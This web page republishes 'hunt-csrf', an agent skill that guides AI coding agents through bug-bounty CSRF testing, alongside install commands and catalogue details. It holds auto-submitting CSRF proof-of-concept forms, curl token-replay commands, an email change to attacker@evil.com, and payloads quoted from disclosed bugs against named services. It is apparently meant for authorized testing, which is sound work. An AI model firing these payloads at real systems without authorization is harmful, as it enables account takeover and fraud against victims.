Security And Hardening
penpot/penpot
Hardens code against vulnerabilities. An agent skill from penpot/penpot.
“Hunting skill for csrf vulnerabilities.”
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-csrf -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install sickn33/agentic-awesome-skills hunt-csrf --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/hunt-csrf .claude/skills/hunt-csrf && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "hunt-csrf" agent skill from https://github.com/sickn33/agentic-awesome-skills/tree/main/skills/hunt-csrf into .claude/skills/hunt-csrf/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-csrf", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/sickn33/agentic-awesome-skills/tree/main/skills/hunt-csrfType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-csrf -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install sickn33/agentic-awesome-skills hunt-csrf --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .agents/skills && cp -r skills-src/skills/hunt-csrf .agents/skills/hunt-csrf && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "hunt-csrf" agent skill from https://github.com/sickn33/agentic-awesome-skills/tree/main/skills/hunt-csrf into .agents/skills/hunt-csrf/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-csrf", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-csrf -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install sickn33/agentic-awesome-skills hunt-csrf --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/skills/hunt-csrf .cursor/skills/hunt-csrf && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "hunt-csrf" agent skill from https://github.com/sickn33/agentic-awesome-skills/tree/main/skills/hunt-csrf into .cursor/skills/hunt-csrf/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-csrf", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/sickn33/agentic-awesome-skills.git --path skills/hunt-csrf--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-csrf -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install sickn33/agentic-awesome-skills hunt-csrf --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/skills/hunt-csrf .gemini/skills/hunt-csrf && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "hunt-csrf" agent skill from https://github.com/sickn33/agentic-awesome-skills/tree/main/skills/hunt-csrf into .gemini/skills/hunt-csrf/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-csrf", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install sickn33/agentic-awesome-skills hunt-csrfInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-csrf -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .github/skills && cp -r skills-src/skills/hunt-csrf .github/skills/hunt-csrf && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "hunt-csrf" agent skill from https://github.com/sickn33/agentic-awesome-skills/tree/main/skills/hunt-csrf into .github/skills/hunt-csrf/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-csrf", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-csrf -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install sickn33/agentic-awesome-skills hunt-csrf --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/skills/hunt-csrf .opencode/skills/hunt-csrf && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "hunt-csrf" agent skill from https://github.com/sickn33/agentic-awesome-skills/tree/main/skills/hunt-csrf into .opencode/skills/hunt-csrf/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-csrf", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
hunt-csrfHunt Csrf is a skill in sickn33/agentic-awesome-skills (47k stars). Its SKILL.md is about 7.1k tokens, and copies of it appear in 1 other owners' repositories. Licence: MIT.
4 steps, taken from the first numbered list in SKILL.md.
Read from SKILL.md and the folder at commit 680176d. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Shell commands in SKILL.md call:
curljqFrom the folder's file list and the shell code blocks in SKILL.md.
Hosts in commands or code, which the agent is likely to contact:
hackerone.comgitlab.comdashboard.stripe.comAlso links to:
github.comdocs.duendesoftware.comblog.calif.ioduendesoftware.comlearn.microsoft.comnestenius.seFrom URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.
From compatibility in the SKILL.md frontmatter.
Hunt Csrf loads about 7.1k tokens when it runs. Until then it costs about 12 tokens; SKILL.md has 2,996 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found no risky patterns in SKILL.md.
Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from sickn33/agentic-awesome-skills at commit 680176d, republished under its MIT licence (© sickn33). 2,996 words, ~7,114 tokens.
.claude/skills/hunt-csrf/SKILL.md (or your agent's skills folder).⚠️ AUTHORIZED USE ONLY This skill is for educational purposes or authorized security assessments only. You must have explicit, written permission from the system owner before using this tool. Misuse of this tool is illegal and strictly prohibited.
Mandatory confirmation gate Before running any command that probes, exploits, changes, persists on, extracts data from, or attempts credential access against a target:
- Ask the user to state the exact target URL, IP, account, or resource.
- Ask the user to confirm written authorization and the permitted scope.
- Show the exact command(s) and explain their expected effect.
- Wait for explicit confirmation in the current conversation.
Without that confirmation, remain read-only and provide defensive guidance only. Prefer a sandbox, disposable VM, or controlled lab.
A raw HTTP client (curl, Burp Repeater, any scripting client) is not a browser: it will send
whatever Origin/Referer header VALUE you set, from any path, on the same connection as your
authenticated cookie. Many apps that claim to defend against CSRF only do a naive string check
on the incoming Origin/Referer header (does it contain/equal some expected value?) rather than
real same-origin enforcement — you can satisfy that check directly by setting the header, with no
actual cross-site delivery (hosting an HTML page, a headless browser) required. This is faster and
more reliable than building a real attacker page for this exact pattern:
POST /profile HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Origin: https://a-domain-the-app-treats-as-trusted-or-attacker-controlled.example
Cookie: <authenticated session>
username=csrf_pocIf some text names a SPECIFIC origin/domain as the "expected" attacker page, that literal value is
often exactly what the server's check is looking for — try it verbatim in Origin (fall back to
Referer if Origin alone doesn't flip it). Only build a real cross-origin page (actual browser
delivery) when the target does genuine SameSite/fetch-based origin enforcement that a spoofed header
can't satisfy.
CSRF only matters on state-changing actions that a browser could be tricked into making cross-site.
Testing flow:
csrf_token, authenticity_token, _token, csrfmiddlewaretoken fields).application/x-www-form-urlencoded, multipart/form-data, OR text/plain are the three CORS "simple" content-types a cross-origin form can send with no preflight. A JSON endpoint is CSRF-resistant only if the server rejects those — if it also accepts a text/plain body (common), craft a text/plain payload that parses as valid JSON (see the JSON-CSRF-via-text/plain section). Don't skip a JSON endpoint on the assumption that application/json alone is protective.High-value targets (in order of impact):
Token bypass techniques when a token IS present:
_token=) — some validate format, not presenceScope: Don't test CSRF on login forms (no existing session to exploit), logout (no real impact), or read-only GET endpoints.
CSRF becomes high-value when it touches state-changing actions with account-level or financial consequences. The highest-paying targets are:
Asset types that pay most: Core product auth flows > API gateways > third-party integrations running on subdomains > admin panels.
/oauth/authorize?RelayState=
/accounts/link
/import/friends
/api/v*/heartbeat
/api/v*/collect
/monitoring/* (Grafana, Prow, Prometheus)
/auth/saml/callback
/connect/* (social integrations)# Missing or weak SameSite cookie attributes
Set-Cookie: session=abc123; HttpOnly # no SameSite = vulnerable
Set-Cookie: session=abc123; SameSite=None # explicitly allows cross-site
# Missing CSRF headers
# No X-Frame-Options or permissive CORS
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true # dangerous combo// Static or predictable CSRF tokens
meta[name="csrf-token"] // grep if value changes across sessions
authenticity_token // Rails — check if reused across page loads
// JSON endpoints without Content-Type enforcement
fetch('/api/heartbeat', {method: 'POST', body: JSON.stringify(data)})
// No CSRF token in form at all
<form method="POST" action="/accounts/link"> // no hidden token fieldauthenticity_token — test if it's static per sessioncsrfmiddlewaretoken — test cross-user/session reuse/api/healthRelayState parameter rarely validated/api/* routesMap all state-changing endpoints — Spider authenticated session, filter for POST/PUT/DELETE/PATCH. Note every form and AJAX call.
Check cookie SameSite attributes — In DevTools → Application → Cookies. Flag any session cookie without SameSite=Strict or Lax.
Test token staticness — Log in twice (different sessions or incognito). Compare authenticity_token / csrfmiddlewaretoken / csrf-token values across:
Test token omission — Remove the CSRF token field entirely from a POST request. If the server returns 200, you have CSRF.
Test token substitution — Replace the token with one from a different session. Server accepting it = broken validation.
Test JSON endpoints for form-POST CSRF — Check if Content-Type is enforced:
application/x-www-form-urlencoded to a JSON endpointtext/plain with a JSON bodyHunt OAuth/SSO RelayState — Intercept SAML/OIDC flows. Test if RelayState is validated for same-origin. Inject external URLs.
Check social linking flows — Every "connect your X account" feature. These often use redirect-based OAuth where CSRF on the callback can associate an attacker's social account.
Test third-party dashboards on subdomains — Grafana, Kibana, Prometheus. Check version, apply known CVEs, test default CSRF posture.
Build PoC HTML page — Host on a different origin, fire the request, confirm cookies are sent and action executes.
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="https://target.com/api/v1/account/link">
<input type="hidden" name="provider" value="attacker_account_id" />
<input type="hidden" name="token" value="oauth_token_here" />
</form>
</body>
</html><html>
<body onload="document.forms[0].submit()">
<form method="POST" action="https://target.com/api/heartbeat"
enctype="text/plain">
<!-- browser sends: {"status":"ok","x":"=padding"} -->
<input type="hidden" name='{"status":"ok","x":"' value='padding"}' />
</form>
</body>
</html># Capture a valid request, then replay without token
curl -s -X POST https://target.com/settings/email \
-H "Cookie: session=YOUR_SESSION" \
-d "email=attacker@evil.com" \
-v 2>&1 | grep -E "HTTP|location|error"# Get token from session A
TOKEN_A=$(curl -s https://target.com/settings -H "Cookie: session=SESSION_A" \
| grep -oP 'authenticity_token[^"]*value="\K[^"]+')
# Use token A in session B's request
curl -s -X POST https://target.com/settings/update \
-H "Cookie: session=SESSION_B" \
-d "authenticity_token=$TOKEN_A&email=test@test.com" \
-v# Find CSRF token fields in HTML responses
grep -Eo 'name="(csrf|_token|authenticity_token|csrfmiddlewaretoken)"[^>]*value="[^"]+"'
# Find forms without CSRF tokens
grep -B5 -A20 '<form method="[Pp][Oo][Ss][Tt]"' response.html | grep -L "csrf\|token\|nonce"
# Check SameSite in response headers
curl -sI https://target.com/login | grep -i "set-cookie"
# Find RelayState parameters
grep -r "RelayState" --include="*.js" .curl -s https://monitoring.target.com/api/health | jq '.version'
# Vulnerable: < 8.3.5, < 8.4.3, < 7.5.15Static CSRF tokens per session — Developers generate one token at login and reuse it. Airbnb bug: authenticity_token was the same across all page loads for a session, making it trivially leakable.
Token not tied to user identity — Token is valid server-wide or rotates on a schedule, not per-user/session. Mozilla bug: csrftoken reusable across users.
Missing token on "secondary" endpoints — Developers protect login/signup but forget API endpoints, import flows, or webhook handlers.
JSON API assumption of safety — Belief that Content-Type: application/json prevents CSRF. It does via CORS preflight — unless the server also accepts text/plain or application/x-www-form-urlencoded.
SameSite=None for cross-site embeds — Developers set SameSite=None to support iframe embeds or third-party integrations, inadvertently re-enabling CSRF.
OAuth RelayState not validated — Developers implement SAML/OIDC but treat RelayState as a redirect hint, not a CSRF state parameter requiring cryptographic binding.
Framework misconfiguration — CSRF middleware excluded for /api/* routes in Django/Rails because "API clients don't need it," but browser-based JS clients do.
Third-party software defaults — Grafana, Kibana, Jenkins shipped with weak or no CSRF protection in older versions; teams don't patch or check.
Bypass: Top-level navigation GET requests still work. If the sensitive action can be triggered via GET (or if a redirect chain converts POST→GET), Lax doesn't protect it. Also: subdomains can still set cookies for parent domain.
Bypasses:
Content-Type: application/json enforcementBypass: Use text/plain enctype with crafted form input names that produce valid JSON. Server receives JSON body, skips CORS preflight.
Bypasses:
<iframe sandbox="allow-scripts allow-forms">)*.target.com is trusted and you have XSS on any subdomaintarget.com.evil.com passes naive string matchingBypass: If attacker can set cookies (subdomain takeover, cookie injection via HTTP), they can set both the cookie and the form field to matching attacker-controlled values.
X-Requested-With)Bypass: Simple requests (form POST, text/plain) don't trigger preflight and can't set custom headers — but some servers only check for header presence, not value, and some frameworks accept requests without it.
CSRF is not browser-only. For targets with a mobile app, enumerate exported deeplink / custom-scheme handlers (scheme://action from the Android manifest / iOS Info.plist) and test whether opening one performs a state-changing action (follow, link, purchase) using the app's ambient session with no CSRF token — deliverable to a victim by a plain link or a QR code. Disclosed: reports/583987, reports/805073.
What can the attacker DO right now? — The attacker must be able to trigger a specific state-changing action (account linking, email change, data deletion, social association) on behalf of the victim without any interaction beyond visiting a URL or page.
What does the victim LOSE? — Identify the concrete harm: account access (ATO), data exposure, financial loss, reputation damage. "A CSRF token is missing" is not impact — "attacker can link their Oculus account to victim's Facebook account, gaining full profile access" is impact.
Can it be reproduced in 10 minutes from scratch? — You must be able to: (a) create attacker and victim accounts, (b) host a static HTML PoC, (c) have victim visit PoC, (d) confirm the action executed in victim's account — all within 10 minutes with no additional prerequisites.
An attacker crafted a malicious page targeting the "Import Friends" OAuth integration. When an authenticated SocialClub user visited the page, the CSRF triggered the OAuth token exchange with an attacker-controlled social account. The victim's SocialClub account became permanently linked to the attacker's Facebook/social identity, enabling full account access without the victim's knowledge. Rated high severity due to complete account compromise path.
During Oculus-Facebook account linking, the OAuth callback lacked proper CSRF state validation. An attacker could craft a URL that, when loaded by an authenticated Facebook user who had started the Oculus linking flow, would associate the attacker's Oculus device credentials with the victim's Facebook account. The attacker then had persistent access to the victim's Facebook profile through the Oculus app. The attack required only that the victim click a link while logged into Facebook.
A POST endpoint accepting application/json was assumed CSRF-safe by developers. A researcher crafted an HTML form using enctype="text/plain" with an input name designed to produce syntactically valid JSON when submitted. The browser sent the request cross-origin without a preflight (no custom headers, text/plain is a simple request), cookies were attached, and the server processed the JSON body as legitimate — silently logging attacker-controlled activity data under the victim's account identity.
The following real, verified bug-bounty / coordinated-disclosure cases extend this skill. Four cases chain CSRF to full ATO; all five are modern (SameSite-era).
Argo CD — SameSite=Lax bypass via sibling subdomain + Content-Type abuse (CVE-2024-22424) (GHSA-92mw-q256-5vwg · Writeup)
marketing.victim.com, target argocd.internal.victim.com → fetch('https://argocd.internal.victim.com/api/v1/applications', {method:'POST', credentials:'include', body:'{"metadata":{"name":"pwn"},"spec":{"source":{"repoURL":"https://attacker/manifest.git"}}}'})Content-Type: application/json, and SameSite=Lax is moot when the attacker controls any sibling subdomain of the shared parentGitLab — CSRF on /api/graphql via GET-converted mutations (H1 #1122408)
<img src="https://gitlab.com/api/graphql?query=mutation{createSnippet(input:{title:%22x%22,visibilityLevel:public,content:%22pwn%22}){snippet{id}}}">X-CSRF-Token validation when the HTTP method was GET; GraphQL accepted mutations via ?query=mutation{...} query stringStripe Dashboard — CSRF middleware disabled by code change (H1 #1483327)
<form method="POST" action="https://dashboard.stripe.com/account/settings" enctype="text/plain"><input name='{"business_name":"pwned","x":"' value='"}'></form> + auto-submit scriptGitHub Enterprise Server — CSRF bypass via path traversal (CVE-2022-23732) (H1 #1497169)
<form method=POST action="https://ghes.victim.com/setup/api/start/..%2f..%2fadmin%2fusers"><input name=login value=attacker></form>HackerOne self — CSRF on social account linking → ATO (H1 #1727221)
<img src="https://hackerone.com/users/social_accounts/google?code=ATTACKER_CODE&state=PREDICTABLE"> — victim's browser completes attacker-initiated link flowDuende BFF (commercial successor to IdentityServer4) is the canonical ASP.NET Core BFF library for SPAs. Its antiforgery primitive is non-standard and not user-bound: instead of ASP.NET Core's per-session/per-user double-submit token, Duende only requires the presence of a static header X-CSRF: 1 on every BFF-mapped endpoint. The header value is identical for every caller; it exists only to force a CORS preflight on cross-origin calls. This collapses CSRF defence to "same-origin + session cookie present" — and produces several distinct attack patterns when one BFF serves multiple privilege partitions.
Architecture primer: browser↔BFF authenticates via an encrypted HttpOnly session cookie (default .AspNetCore.Cookies); BFF↔API uses OAuth tokens cached server-side. Endpoints registered via MapBffManagementEndpoints / MapRemoteBffApiEndpoint / MapBffApiEndpoint enforce X-CSRF: 1 and session presence — nothing else. (docs.duendesoftware.com/bff, Duende blog Mar 2025)
X-CSRF: 1 is not user-bound, so cross-role replay succeeds same-originWhen a single BFF serves /admin/* and /user/* partitions, the antiforgery primitive cannot distinguish role-A from role-B. Any same-origin script that can land an XHR with X-CSRF: 1 and the victim's session cookie reaches admin endpoints if the victim has the admin role. Stock ASP.NET Core antiforgery (which binds the token to HttpContext.User.Identity.Name and rejects on identity change) does the right thing here; Duende BFF does not. (docs.duendesoftware.com/bff/fundamentals/options)
Payload shape: from a logged-in low-priv session, fetch('/bff/admin/users/delete?id=42', {credentials:'include', headers:{'X-CSRF':'1'}}) — succeeds if the victim's session happens to hold the admin role and the attacker can land any same-origin script (self-XSS, subdomain-takeover JS, dependency-confusion).
/negotiate shortcut)Browser WebSockets cannot send custom headers, so X-CSRF: 1 cannot be enforced on the upgrade. Developers routinely work around this by excluding SignalR hub paths from BFF antiforgery (MapHub<X>().DisableAntiforgery() or registering them as non-BFF endpoints). Once excluded, any same-site origin (including a takenover sibling subdomain or a stored-XSS page) can open the WS with the ambient session cookie → CSRF-over-WebSocket to invoke hub methods that mutate state.
Payload shape: cross-origin page opens new WebSocket("wss://bff.example.com/hubs/admin") — browser sends session cookie, no X-CSRF required, attacker invokes DeleteUser(id) via standard SignalR JSON frame. (DuendeArchive/Support#972, learn.microsoft.com/aspnet/core/signalr/security)
BFF session cookies default to host-only, but developers commonly override with options.Cookie.Domain = ".example.com" to share login across app.example.com and admin.example.com. This drops the __Host- prefix protection. Take over legacy.example.com (CNAME to deprovisioned Heroku/S3) → set Set-Cookie: .AspNetCore.Cookies=<attacker_session>; Domain=.example.com → victim hits app.example.com carrying attacker's session = session-fixation ATO. (nestenius.se BFF cookie hardening)
No Duende.BFF-direct CVE exists as of 2026-05. The three classes above are design-level / documented behaviour that becomes a live finding when paired with a co-resident primitive (same-origin script execution, SignalR carve-out, or subdomain takeover). Report severity should lean on the chain's business impact rather than CVE citation. Adjacent confirmed CVEs in the Duende ecosystem: CVE-2025-26620 (Duende.AccessTokenManagement race), CVE-2024-51987 (Duende.AccessTokenManagement.OpenIdConnect incorrect-token-after-refresh), CVE-2024-39694 (Duende.IdentityServer open redirect). (Duende advisories on GitHub)
curl https://target/bff/user -H 'X-CSRF: 1' -b '<session>' — dumps the full claim set including internal IDs, role names, tenant IDs (info disclosure on its own).Set-Cookie on /bff/login callback — flag Domain= attribute (vs __Host- prefix); flag missing Secure/HttpOnly.X-CSRF: 1 to confirm no per-role token binding./hubs/*, /signalr/*) — open without X-CSRF; if 101 Switching Protocols, CSWSH-style attacks viable.*.example.com if BFF cookie has Domain=.example.com.hunt-xss — Any XSS on a trusted origin neutralizes CSRF defenses (token, SameSite, Origin check) instantly. Chain primitive: XSS reads the meta[name=csrf-token] value and same-origin-fetches /accounts/email with attacker payload → one-click ATO via attacker-page postMessage triggering the stored XSS to perform the state change.hunt-auth-bypass — CSRF combined with an auth-bypass primitive lets attacker-side scripts perform state changes that should have required step-up auth. Chain primitive: CSRF on /settings/password reaches an endpoint that skips the re-auth check → password change executes without the victim ever entering their current password → ATO.hunt-oauth — OAuth/SAML state/RelayState is structurally a CSRF token; missing validation here is account-linking CSRF. Chain primitive: attacker initiates OAuth on their account, sends victim the /callback?code=X&state= URL → victim's logged-in browser completes the link → attacker's social identity now controls victim's account.security-arsenal — Reach for the CSRF PoC templates (form POST, enctype=text/plain JSON, sandboxed-iframe null-origin, base64 multipart bypass) before writing one from scratch; also the WAF-bypass header variants for Origin/Referer checks.triage-validation — Run the Pre-Severity Gate before submitting CSRF on a logout endpoint or any action without state-change consequence — those are the canonical N/A traps. Confirm victim LOSES something concrete (account access, money, data), not just "a request executed."triage-validation) before reporting; report via report-writing. Prefer a sandbox, disposable VM, or controlled lab.# Read-only first step; confirm scope before anything active.
cat scope.txt # target list from the authorized engagement briefAdapted from elementalsouls/Claude-BugHunter (MIT); frontmatter, When to Use/Limitations, and safety boundaries added for upstream compliance. Docs-only import: executable helpers, commands, engine, and research assets not bundled.
© sickn33, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in skills/hunt-csrf of sickn33/agentic-awesome-skills.
Open the folder on GitHubat commit 680176d
We found 5 copies of this SKILL.md (exact, near-identical or edited) in other folders, from 1 other GitHub owner. This page covers the copy in sickn33/agentic-awesome-skills, which our catalogue first saw on October 7, 2026.
Hunt Csrf next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Hunt Csrf this skillsickn33/agentic-awesome-skills | 47k | 1 repos | ~7.1k | Automated safety check: Pass | MIT | |
| Security And Hardeningpenpot/penpot | 61k | 6 repos | ~4.7k | Automated safety check: Notes | MPL-2.0 | |
| Security Auditoreigent-ai/eigent | 15k | — | ~1.8k | Automated safety check: Notes | Apache-2.0 | |
| Security Reviewjewbetcha/opentrace | 116 | 18 repos | ~3.1k | Automated safety check: Notes | MIT | |
| Strix Code Vulnerability Scanusestrix/strix | 67k | — | ~1.1k | Automated safety check: Pass | Apache-2.0 | |
| Code Audit3stoneBrother/code-audit | 892 | 1 repos | ~2.7k | Automated safety check: Pass | None |
penpot/penpot
Hardens code against vulnerabilities. An agent skill from penpot/penpot.
eigent-ai/eigent
Audits source code, dependencies and config files for vulnerabilities and hardcoded secrets, using two bundled Python scanners and an OWASP Top 10 checklist.
jewbetcha/opentrace
A skill your agent uses when adding authentication, handling user input, working with secrets, creating API endpoints, or implementing payment/sensitive features.
usestrix/strix
Runs a Strix white-box security review that reads the source, then exploits what it finds in a sandbox so each reported issue has a proof-of-concept.
3stoneBrother/code-audit
Professional code security audit skill covering 55+ vulnerability types.
usestrix/strix
Triages findings from a Strix pentest by severity, fixes each root cause with a minimal change, and re-runs Strix to confirm the exploit no longer works.
sickn33/agentic-awesome-skills
Implements an interface in one of two named color modes, iridescent white or colorful black, from a parameterized starter that reports measured color intensity.
sickn33/agentic-awesome-skills
Saves a user's project decisions, rules and preferences into a project-local mdbase so later sessions and other agents can recover the intent.
sickn33/agentic-awesome-skills
Keeps project decisions, research and verified results available across coding-agent sessions through LWC memory, a document Wiki graph and a CodeGraph code index.
sickn33/agentic-awesome-skills
Guides an agent through assessing its own owner for cofounder fit, publishing an approved profile, and ranking complementary profiles other agents published for their owners.
sickn33/agentic-awesome-skills
Integracao com WhatsApp Business Cloud API (Meta). An agent skill from sickn33/agentic-awesome-skills.
sickn33/agentic-awesome-skills
Acts as a proxy for the Cline CLI, dispatching coding tasks one at a time, monitoring runs by hard evidence, relaying decisions to you and learning per-project preferences.
Categories
Run `npx skills add sickn33/agentic-awesome-skills --skill hunt-csrf -a claude-code`. Or copy the skill folder (skills/hunt-csrf in sickn33/agentic-awesome-skills) into .claude/skills/hunt-csrf in your project. Claude Code loads it when a task matches its description.
Run `npx skills add sickn33/agentic-awesome-skills --skill hunt-csrf -a codex`. Or copy the skill folder (skills/hunt-csrf in sickn33/agentic-awesome-skills) into .agents/skills/hunt-csrf in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add sickn33/agentic-awesome-skills --skill hunt-csrf -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/hunt-csrf, .gemini/skills/hunt-csrf, .github/skills/hunt-csrf and .opencode/skills/hunt-csrf in your project.
Going by SKILL.md and its folder, Hunt Csrf needs the command-line tools its instructions call (curl and jq). Compatibility (from SKILL.md): Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled..
SKILL.md names 9 domains. In commands or code: hackerone.com, gitlab.com and dashboard.stripe.com; the agent is likely to contact these when it follows the instructions. As links in the text: github.com, docs.duendesoftware.com, blog.calif.io, duendesoftware.com, learn.microsoft.com and nestenius.se. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.
Hunt Csrf is published under the MIT licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.
About 7.1k tokens (SKILL.md is roughly 28k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Hunt Csrf: Security And Hardening (penpot/penpot, 61k stars), Security Auditor (eigent-ai/eigent, 15k stars), Security Review (jewbetcha/opentrace, 116 stars) and Strix Code Vulnerability Scan (usestrix/strix, 67k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
sickn33 (a GitHub user) maintains it in sickn33/agentic-awesome-skills, which has 47,379 GitHub stars. The repository holds 1,493 skills in this directory. The repository was last updated on October 9, 2026.
Source: sickn33/agentic-awesome-skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.